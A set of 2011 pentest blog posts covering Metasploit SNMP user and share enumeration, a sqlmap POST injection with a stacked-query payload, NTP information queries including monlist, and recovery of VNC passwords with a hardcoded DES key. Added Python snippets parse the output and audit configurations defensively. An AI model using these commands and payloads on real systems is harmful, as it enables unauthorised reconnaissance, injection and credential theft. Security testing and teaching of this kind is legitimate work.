Wednesday, March 23, 2011

New SNMP Metasploit Modules

My new favorite modules (for today) are snmp_enumusers and snmp_enumshares, which work against Windows hosts that have SNMP running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_set

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS

msf auxiliary(snmp_login) > run

[+] SNMP: community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...

[*] Host provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info

This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS
msf auxiliary(snmp_enumusers) > run

[+] Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info

This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS
msf auxiliary(snmp_enumshares) > run

backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
NewBackup2 - (J:\NewBackup2)
SharepointBackup - (K:\SharepointBackup)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed
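Triage helper for the output above, added here as an example (not part of the original post or of Metasploit): it parses the snmp_login, snmp_enumusers and snmp_enumshares lines into a structured record and ranks what they mean for the host. The transcript embedded in it is a constructed paste of the lines shown in this post; the severity labels and the "default community" list are my own assumptions.

```python
import re

# Constructed sample transcript: the snmp_login, snmp_enumusers and
# snmp_enumshares output lines from the session above, pasted together.
SAMPLE_TRANSCRIPT = """\
[+] SNMP: community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[+] Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
backup - (C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\backup)
NewBackup2 - (J:\\NewBackup2)
"""

COMMUNITY_RE = re.compile(r"^\[\+\] SNMP: community string: '([^']*)' info: '(.*)'$")
RW_RE = re.compile(r"^\[\*\] Host provides READ-WRITE access with community '([^']*)'$")
USERS_RE = re.compile(r"^\[\+\] Found Users: (.*)$")
SHARE_RE = re.compile(r"^(\S+) - \((.*)\)$")
WINVER_RE = re.compile(r"Windows Version (\d+\.\d+) \(Build (\d+)")

# Community strings shipped as defaults on many agents (assumed list);
# their presence is a finding on its own.
DEFAULT_COMMUNITIES = {"public", "private"}


def _new_entry(community, sysdescr=""):
    return {"access": "READ-ONLY", "sysdescr": sysdescr,
            "default": community in DEFAULT_COMMUNITIES}


def parse_transcript(text):
    """Turn msfconsole output lines into one structured finding record."""
    findings = {"communities": {}, "users": [], "shares": {}}
    for line in text.splitlines():
        m = COMMUNITY_RE.match(line)
        if m:
            community, sysdescr = m.groups()
            entry = findings["communities"].setdefault(community, _new_entry(community))
            entry["sysdescr"] = sysdescr
            wv = WINVER_RE.search(sysdescr)
            if wv:  # sysDescr leaks the OS version and build
                entry["windows_version"] = wv.group(1)
                entry["build"] = int(wv.group(2))
            continue
        m = RW_RE.match(line)
        if m:
            community = m.group(1)
            findings["communities"].setdefault(community, _new_entry(community))["access"] = "READ-WRITE"
            continue
        m = USERS_RE.match(line)
        if m:
            findings["users"].extend(u.strip() for u in m.group(1).split(","))
            continue
        m = SHARE_RE.match(line)
        if m:  # share name -> local path, as printed by snmp_enumshares
            findings["shares"][m.group(1)] = m.group(2)
    return findings


def risk_summary(findings):
    """One line per issue, most severe first, suitable for a report or ticket."""
    lines = []
    for community, e in sorted(findings["communities"].items()):
        if e["access"] == "READ-WRITE":
            lines.append(f"CRITICAL: community '{community}' grants READ-WRITE access "
                         f"(SNMP SET allowed, so agent configuration can be changed)")
        elif e["default"]:
            lines.append(f"HIGH: default community '{community}' grants READ-ONLY access")
        else:
            lines.append(f"MEDIUM: community '{community}' recovered by guessing")
    if findings["users"]:
        lines.append(f"INFO: {len(findings['users'])} local accounts exposed via LanManager OIDs")
    if findings["shares"]:
        lines.append(f"INFO: {len(findings['shares'])} SMB shares and their local paths exposed")
    return lines


if __name__ == "__main__":
    for line in risk_summary(parse_transcript(SAMPLE_TRANSCRIPT)):
        print(line)
```

Paste a real msfconsole session in place of SAMPLE_TRANSCRIPT; the regexes are anchored to the exact line shapes shown in this post, so if a module's output format changes the affected lines are simply skipped rather than misread.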

Monday, March 21, 2011

sqlmap with POST requests

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL <-- Target URL
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
--postfix=POSTFIX <-- Injection payload postfix string
--dbms=DBMS <-- Force back-end DBMS to this value

* use --dbms= if sqlmap's fingerprinting is sucking

we'll assume we have a simple POST request

user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the parameters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be sent before we can inject. Here we had to issue a tick ( ' ) and a right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
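To see why that prefix works, and what actually stops it, here is an added example (not from the post and not sqlmap code). It assumes a hypothetical server-side query in which the username sits inside a quoted, parenthesised predicate, so a leading `')` closes both; the post never shows the real query, so that template is a guess that fits the payload. It builds the concatenated query, splits it into the statements the DBMS would see, and then runs the same lookup parameterised against an in-memory SQLite table (standing in for MSSQL) to show the payload is treated as a plain string.

```python
import sqlite3

# Constructed payload: the stacked-queries payload sqlmap reported above, as the
# server sees it in usernameTxt after URL decoding.
PAYLOAD = "blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo"

# Hypothetical query shape for the login handler (assumption; the post does not
# show the real one). It matches the prefix sqlmap needed: the value sits inside
# quotes inside parentheses, so a leading ') closes both before the injected statement.
UNSAFE_TEMPLATE = "SELECT id FROM users WHERE (username='%s') AND (password='%s')"


def build_unsafe_query(username, password):
    """String concatenation, the way a vulnerable login handler builds its SQL."""
    return UNSAFE_TEMPLATE % (username, password)


def split_statements(sql):
    """Split on ';' outside single quotes to show how many statements the DBMS
    would receive. Demonstration only: it ignores escaping and comment syntax."""
    statements, buf, in_quote = [], [], False
    for ch in sql:
        if ch == "'":
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            statements.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    tail = "".join(buf).strip()
    if tail:
        statements.append(tail)
    return statements


def make_demo_db():
    """In-memory SQLite table standing in for the application's user store
    (constructed demo data; plaintext only to keep the example short)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'demo-only')")
    conn.commit()
    return conn


def safe_lookup(conn, username, password):
    """Parameterised form: the driver binds the value, so the payload is compared
    as a literal string and never parsed as SQL. Returns the user id or None."""
    row = conn.execute(
        "SELECT id FROM users WHERE (username=?) AND (password=?)",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    injected = build_unsafe_query(PAYLOAD, "blah")
    print(injected)
    for i, stmt in enumerate(split_statements(injected), 1):
        print(f"  statement {i}: {stmt}")
    conn = make_demo_db()
    print("parameterised lookup with the payload:", safe_lookup(conn, PAYLOAD, "blah"))
```

The split shows three pieces: the original SELECT, closed early by `')`, then `WAITFOR DELAY '0:0:5'` as a second statement, then `--` commenting out the rest of the application's predicate, which is exactly the shape sqlmap labels "stacked queries". The parameterised lookup returns None for the payload because no username literally equals that string.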

Friday, March 18, 2011

I forgot my NTP stuff, so here's more notes on it

yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so i had to remember how to use the NTP tools to pull some info.

here are my notes:

ntpdc -c sysinfo
ntpdc -c monlist
ntpdc -c listpeers
ntpdc -c peers
ntpdc -c reslist

and inside ntpq:
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]

ntpq> help
ntpq commands:
addvars debug lopeers passociations rl
associations delay lpassociations passwd rmvars
authenticate exit lpeers peers rv
cl help mreadlist poll showvars
clearvars host mreadvar pstatus timeout
clocklist hostnames mrl quit version
clockvar keyid mrv raw writelist
cooked keytype ntpversion readlist writevar
cv lassociations opeers readvar


chris@notbt:/pentest$ ntpq
ntpq> lpeers

remote refid st t when poll reach delay offset jitter
*computerville.wxy.suk 2 u 338 1024 377 35.327 -0.702 1.030

ntpq> version

ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)

ntpq> host

current host is

ntpq> readlist

assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,

version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)",
processor="x86_64", system="Linux/", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,

clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,

tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144

ntpq> hostnames

hostnames being shown

ntpq> keytype

keytype is MD5

ntpq> ntpversion

NTP version being claimed is 2

ntpq> associations

ind assID status conf reach auth condition last_event cnt
1 18290 964a yes yes none sys.peer 4

ntpq> pstatus 18290

assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,, srcport=123, dstadr=,

dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,

rootdisp=33.768, refid=,
reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,

unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,

keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,
xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,

filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96

chris@notbt:/pentest$ ntpdc -c monlist

remote address port local address count m ver code avgint lstint
=============================================================================== 123 6832 4 4
90 1044 476

chris@notbt:/pentest$ ntpdc -c sysinfo

system peer:
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: []
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s

chris@notbt:/pentest$ ntpdc -c listpeers


chris@notbt:/pentest$ ntpdc -c peers

remote local st poll reach delay offset disp
*computerville.wxy.suk 2 1024 377 0.03532 -0.000702 0.13974

chris@notbt:/pentest$ ntpdc -c reslist

address mask count flags

===================================================================== 6846 nomodify, nopeer

some-domain 0 none

some-domain 0 ignore 0 ignore

:: :: 0 nomodify, nopeer

ip6-localhost ffff:ffff:ffff: 0 ignore

fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore
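The reslist output above is the interesting bit from the defender's side: the default rule carries nomodify and nopeer but no noquery, which is exactly why readlist and monlist answered from another host. Here is an added example (not from the post, and not an ntp.org tool) that audits the restrict lines of an ntp.conf for that gap. Both config fragments are constructed; WEAK_CONF mirrors the flags shown in the reslist above, HARDENED_CONF is the usual default that also refuses mode 6/7 control queries from non-local hosts. The flag names are the ones ntpd's restrict command accepts.

```python
# Constructed ntp.conf fragments (not from the post). WEAK_CONF mirrors what the
# reslist output above shows for the default rule: nomodify and nopeer, but no
# noquery. HARDENED_CONF adds noquery (and kod/notrap) for both address families.
WEAK_CONF = """\
driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org
restrict default nomodify nopeer
restrict 127.0.0.1
restrict ::1
"""

HARDENED_CONF = """\
driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org
restrict -4 default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict ::1
"""

# Access-control flags accepted by ntpd's restrict command.
KNOWN_FLAGS = {"ignore", "kod", "limited", "nomodify", "nopeer",
               "noquery", "noserve", "notrap", "version"}
LOOPBACKS = {"127.0.0.1", "::1"}


def parse_restrict_rules(conf):
    """Parse each 'restrict' line into address, optional mask and flag set."""
    rules = []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        tokens = line.split()
        if not tokens or tokens[0] != "restrict":
            continue
        tokens = tokens[1:]
        if tokens and tokens[0] in ("-4", "-6"):
            tokens = tokens[1:]  # address-family selector
        if not tokens:
            continue
        address, rest = tokens[0], tokens[1:]
        mask = None
        if len(rest) >= 2 and rest[0] == "mask":
            mask, rest = rest[1], rest[2:]
        rules.append({"address": address, "mask": mask, "flags": set(rest)})
    return rules


def audit_restrict(conf):
    """Return one finding per weakness; an empty list means every rule for
    non-loopback sources denies control queries and modification."""
    findings = []
    rules = parse_restrict_rules(conf)
    if not any(r["address"] == "default" for r in rules):
        findings.append("no 'restrict default' rule: unlisted hosts get full access")
    for r in rules:
        if r["address"] in LOOPBACKS or "ignore" in r["flags"]:
            continue  # local admin access, or the source is dropped entirely
        unknown = r["flags"] - KNOWN_FLAGS
        if unknown:
            findings.append(f"{r['address']}: unrecognised flags {sorted(unknown)}")
        if "noquery" not in r["flags"]:
            findings.append(f"{r['address']}: missing noquery, so mode 6/7 control "
                            f"queries (readlist, monlist, peers) are answered")
        if "nomodify" not in r["flags"]:
            findings.append(f"{r['address']}: missing nomodify, so ntpq/ntpdc "
                            f"requests that modify server state are not refused")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_restrict(conf) or ["no findings"])
```

With noquery on the default rule, the ntpq and ntpdc commands listed in this post still work from localhost but stop returning anything to remote hosts, which is the fix for the information the readlist, monlist and sysinfo output above hands out.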

Tuesday, March 15, 2011

VNC passwords and Metasploit and DES

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec

or use this one, where you can just put your hash on the command line and don't have to recompile every time.